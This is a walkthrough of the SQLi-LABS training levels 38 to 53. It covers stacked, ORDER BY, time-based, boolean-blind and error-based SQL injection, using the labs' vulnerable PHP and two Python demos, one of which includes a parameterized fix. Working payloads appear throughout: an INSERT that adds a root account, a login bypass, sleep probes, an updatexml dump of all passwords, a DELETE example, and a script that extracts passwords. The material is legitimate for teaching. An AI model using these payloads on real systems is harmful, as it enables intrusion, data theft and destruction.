SQLi-LABS3

Less-38

Stacked queries

<?php
// Less-38 (sqli-labs): the id parameter is concatenated into the query without any
// escaping and executed with mysqli_multi_query(), so a ';' in the input starts a
// second statement. $con1 is the mysqli connection the lab opens earlier in the
// same file (not shown here).
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql)) {
        /* store first result set: only the first statement's rows are displayed,
           but every statement in $sql has already been executed by the server */
        if ($result = mysqli_store_result($con1)) {
            if ($row = mysqli_fetch_row($result)) {
                echo '<font size="5" color="#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);
                echo "<br>";
                echo "</font>";
            }
            // mysqli_free_result($result);
        }
        /* print divider */
        if (mysqli_more_results($con1)) {
            //printf("-----------------\n");
        }
        /* the remaining result sets (and their errors) are never consumed */
        //while (mysqli_next_result($con1));
    } else {
        /* only an error in the FIRST statement is reported here */
        echo '<font size="5" color="#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
    /* close connection */
    mysqli_close($con1);
}

Tips:
In SQL the semicolon (;) marks the end of a statement. If we end one statement with ; and then construct another one after it, will both be executed? That idea is the basis of stacked injection. A union injection also combines two statements, so what is the difference? With union or union all the statement you can append is limited to a query, whereas a stacked query can be any statement. For example, the user enters: 1; DELETE FROM products. The server, which does not filter the parameter, builds: Select * from products where productid=1;DELETE FROM products. When this runs, the first statement shows the query result and the second deletes every row of the products table.

Two things the lab code above makes visible. First, stacking only works because the query is sent through mysqli_multi_query(); a single-statement API such as mysqli_query() rejects the second statement, although the query would still be injectable in other ways. Second, because the code never calls mysqli_next_result(), only the first statement's result set or error is ever shown, so a second statement that fails does so silently; you have to verify its effect with a separate request.
Answer:

http://192.168.3.7/sqli/Less-38/?id=1';insert into users(id,username,password) values (120,'root','root')--+

The trailing + decodes to a space, which MySQL's -- comment requires; the comment swallows the lab's closing quote and LIMIT 0,1. Confirm the INSERT ran by requesting ?id=120 afterwards.

Less-39

Stacked queries with an integer id (no quote to close)

Less-40

Same as above; close with ') and errors are not displayed.

Less-41

Same as above; nothing to close (integer id) and errors are not displayed.

Less-42

Stacked injection is present in the login form's password field.

username=a' or 1#
password=a

Login fails. Now try the same thing in the password field:

username=a
password=a' or 1#

Login succeeds, so the password is not filtered (the username is), and that is where the payload goes.

Less-43

Same idea as the previous level; close with ').

Less-44

Basically the same as Less-42; the difference is that nothing is echoed back:

// Less-44: only the username goes through mysqli_real_escape_string(); the password
// is concatenated as received, so the injection point moves to the password field.
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
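The Less-42/44 situation as an added example (not from the page or from sqli-labs) in Python with an in-memory SQLite table: the username is escaped, the password is not, and the login check is shown next to its parameterized fix. SQLite has no # comment, so the payloads use -- (with a trailing space) where the page uses #; the accounts and function names are constructed for the demo, and escape() stands in for mysqli_real_escape_string() using SQLite's quote-doubling rule.

```python
import sqlite3

# Constructed sample accounts (not the lab's data).
SEED = [("Dumb", "Dumb"), ("admin", "admin")]


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED)
    return conn


def escape(value):
    """Stand-in for mysqli_real_escape_string() on one field. SQLite escapes a
    quote by doubling it (MySQL uses a backslash); the effect on the payload is
    the same: the quote can no longer end the string literal."""
    return value.replace("'", "''")


def login_vulnerable(conn, user, pw):
    """Less-42/44 shape: username escaped, password concatenated as received.
    Returns the username of the first matching row, or None."""
    sql = f"SELECT username FROM users WHERE username='{escape(user)}' AND password='{pw}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, user, pw):
    """Both values bound as parameters; neither field ever becomes SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?", (user, pw)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = fresh_db()
    print("payload in username:", login_vulnerable(db, "a' or 1-- ", "a"))
    print("payload in password:", login_vulnerable(db, "a", "a' or 1-- "))
    print("fixed:", login_fixed(db, "a", "a' or 1-- "))
```

With the payload in the username the query becomes WHERE username='a'' or 1-- ' AND password='a' (a harmless string compare, login fails); in the password field it becomes WHERE username='a' AND password='a' or 1, which is true for every row, so the first account is returned and the login succeeds.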

Less-45

Same, but closed with ').

Less-46

ORDER BY time-based injection

// Less-46: the sort parameter is placed directly after ORDER BY with no quoting
// (Less-47 wraps it in single quotes). $result comes from the legacy mysql_* extension, as in the lab.
$id = $_GET['sort'];

$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);

sort=1 desc and sort=1 asc return the rows in different orders, so the parameter reaches the query and is injectable. The MySQL 5 SELECT syntax shows what can follow ORDER BY (a column name, an expression, or a position) and what else can still be appended after it:

SELECT 
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr ...]
[FROM table_references
[WHERE where_condition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_condition]
[ORDER BY {col_name | expr | position}
[ASC | DESC], ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name'
| INTO var_name [, var_name]]
[FOR UPDATE | LOCK IN SHARE MODE]]

Blind injection

Time-based blind

http://192.168.3.7/sqli/Less-46/?sort=if(1=1,sleep(3),1) %23
http://192.168.3.7/sqli/Less-46/?sort=if(1=2,sleep(3),1) %23

The first request is delayed, the second is not. %23 is a URL-encoded #, which comments out whatever the lab appends after the parameter. An expression in ORDER BY is evaluated for every row being sorted, so the total delay is sleep(3) multiplied by the number of rows in users; keep the sleep value small.

Boolean-based blind
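The boolean-based variant, as an added example that is not from the page or from sqli-labs: a Python script against an in-memory SQLite table with the same ORDER BY $sort shape as Less-46. It turns the sort direction into a yes/no oracle and recovers a password with a binary search over character codes. In MySQL the same payload would be sort=if((condition),id,-id) with ascii() in place of unicode(); the table contents and the helper names (list_users, oracle, extract) are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the lab's `users` table (not the lab's data).
SEED = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED)
    return conn


def list_users(conn, sort):
    """Less-46 shape: the sort parameter lands directly after ORDER BY."""
    return conn.execute(f"SELECT id, username FROM users ORDER BY {sort}").fetchall()


def oracle(conn, condition):
    """Boolean oracle through ORDER BY: when `condition` is true the rows come
    back ascending by id, otherwise descending, so the first id is the answer.
    MySQL form of the same payload: sort=if((condition),id,-id)."""
    rows = list_users(conn, f"(CASE WHEN ({condition}) THEN id ELSE -id END)")
    return rows[0][0] == 1


def extract(conn, subquery, max_len=64):
    """Recover the string produced by `subquery` one character at a time,
    binary-searching its code point with unicode()/substr() (ascii()/substr()
    in MySQL). About 8 requests per character instead of one per candidate."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 1, 127  # printable ASCII search space
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = fresh_db()
    print("sort=1 desc:", list_users(db, "1 desc"))
    print("recovered:", extract(db, "SELECT password FROM users WHERE id=2"))
```

The length probe stops the loop cleanly at the end of the string; without it, unicode() of an empty substring is NULL, the CASE falls through to the ELSE branch and every comparison reads as false, which would silently pad the result with chr(1).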

Error-based injection

http://192.168.3.7/sqli/Less-46/?sort=updatexml(1,substr(concat(0x23,(select group_concat(password) from users ),0x23),65,96),1)%23

updatexml() reports only the first 32 characters of the malformed XPath expression in its error, which is why the result is wrapped in 0x23 (#) markers and substr() is moved along to page through the concatenated passwords.

Less-47

Same as above, closed with a single quote.

Less-48

ORDER BY time-based blind injection

http://192.168.3.7/sqli/Less-48/?sort=if(1=1,sleep(3),1) %23

Less-49

Same as above, closed with a single quote.

Less-50

ORDER BY with stacked queries

Less-51

Stacked queries

Less-52

Stacked queries

Less-53

Stacked queries